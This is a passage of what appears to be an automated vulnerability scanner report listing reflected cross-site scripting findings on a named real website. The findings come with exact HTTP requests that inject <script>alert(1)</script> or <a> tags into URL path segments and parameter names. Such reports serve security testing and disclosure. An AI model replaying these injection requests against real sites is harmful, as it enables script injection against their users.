
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/search.php?keyword=search...&Submit3=Searchcbbf7<a>10fddf5b5ce&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/search.php?keyword=search...&Submit3=Searchcbbf7<a>10fddf5b5ce&opt=2 was not found on this server.</p>
...[SNIP]...

2.3569. http://www.resellerbase.com/detail/7/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 561ba<a>5fbd0e4775b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/search.php?keyword=search...561ba<a>5fbd0e4775b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/search.php?keyword=search...561ba<a>5fbd0e4775b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3570. http://www.resellerbase.com/detail/7/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 63689<script>alert(1)</script>40b983b56f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/search.php?keyword=search...&Submit3=Search&opt=2&63689<script>alert(1)</script>40b983b56f7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/search.php?keyword=search...&Submit3=Search&opt=2&63689<script>alert(1)</script>40b983b56f7=1 was not found on this server.</p>
...[SNIP]...

2.3571. http://www.resellerbase.com/detail/7/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 38655<a>8dd74fec702 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/search.php?keyword=search...&Submit3=Search&opt=238655<a>8dd74fec702 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/search.php?keyword=search...&Submit3=Search&opt=238655<a>8dd74fec702 was not found on this server.</p>
...[SNIP]...

2.3572. http://www.resellerbase.com/detail/7/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 24b4e<script>alert(1)</script>dd560e662bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail24b4e<script>alert(1)</script>dd560e662bc/7/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail24b4e<script>alert(1)</script>dd560e662bc/7/themes/ was not found on this server.</p>
...[SNIP]...

2.3573. http://www.resellerbase.com/detail/7/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 932be<script>alert(1)</script>73f8236ffd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7932be<script>alert(1)</script>73f8236ffd3/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7932be<script>alert(1)</script>73f8236ffd3/themes/ was not found on this server.</p>
...[SNIP]...

2.3574. http://www.resellerbase.com/detail/7/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1fe4<script>alert(1)</script>36c43cc17e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themesf1fe4<script>alert(1)</script>36c43cc17e3/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themesf1fe4<script>alert(1)</script>36c43cc17e3/ was not found on this server.</p>
...[SNIP]...

2.3575. http://www.resellerbase.com/detail/7/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f99c2<script>alert(1)</script>dc6a4637566 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/?f99c2<script>alert(1)</script>dc6a4637566=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/?f99c2<script>alert(1)</script>dc6a4637566=1 was not found on this server.</p>
...[SNIP]...

2.3576. http://www.resellerbase.com/detail/7/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe3b9<script>alert(1)</script>d4d08bf8261 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfe3b9<script>alert(1)</script>d4d08bf8261/7/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfe3b9<script>alert(1)</script>d4d08bf8261/7/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3577. http://www.resellerbase.com/detail/7/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c944<script>alert(1)</script>c5696da83b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/72c944<script>alert(1)</script>c5696da83b5/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/72c944<script>alert(1)</script>c5696da83b5/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3578. http://www.resellerbase.com/detail/7/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 458ef<script>alert(1)</script>6e01fe9e035 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes458ef<script>alert(1)</script>6e01fe9e035/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes458ef<script>alert(1)</script>6e01fe9e035/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3579. http://www.resellerbase.com/detail/7/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee583<script>alert(1)</script>8cbbd828715 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmosee583<script>alert(1)</script>8cbbd828715/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmosee583<script>alert(1)</script>8cbbd828715/ was not found on this server.</p>
...[SNIP]...

2.3580. http://www.resellerbase.com/detail/7/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2b3c8<script>alert(1)</script>007c239e86d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/?2b3c8<script>alert(1)</script>007c239e86d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/?2b3c8<script>alert(1)</script>007c239e86d=1 was not found on this server.</p>
...[SNIP]...

2.3581. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload acbc2<script>alert(1)</script>99d3f17ecb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailacbc2<script>alert(1)</script>99d3f17ecb8/7/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailacbc2<script>alert(1)</script>99d3f17ecb8/7/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3582. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 780c8<script>alert(1)</script>bd4fcf8846d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7780c8<script>alert(1)</script>bd4fcf8846d/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7780c8<script>alert(1)</script>bd4fcf8846d/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3583. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 87a21<script>alert(1)</script>018a6395970 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes87a21<script>alert(1)</script>018a6395970/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes87a21<script>alert(1)</script>018a6395970/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3584. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37798<script>alert(1)</script>4f995f85268 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos37798<script>alert(1)</script>4f995f85268/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos37798<script>alert(1)</script>4f995f85268/images/ was not found on this server.</p>
...[SNIP]...

2.3585. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4fa30<script>alert(1)</script>ec7de2d5346 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images4fa30<script>alert(1)</script>ec7de2d5346/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images4fa30<script>alert(1)</script>ec7de2d5346/ was not found on this server.</p>
...[SNIP]...

2.3586. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 97fb8<script>alert(1)</script>4f0efd6cfd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/?97fb8<script>alert(1)</script>4f0efd6cfd6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/?97fb8<script>alert(1)</script>4f0efd6cfd6=1 was not found on this server.</p>
...[SNIP]...

2.3587. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8f70<script>alert(1)</script>45631db7b5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild8f70<script>alert(1)</script>45631db7b5e/7/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
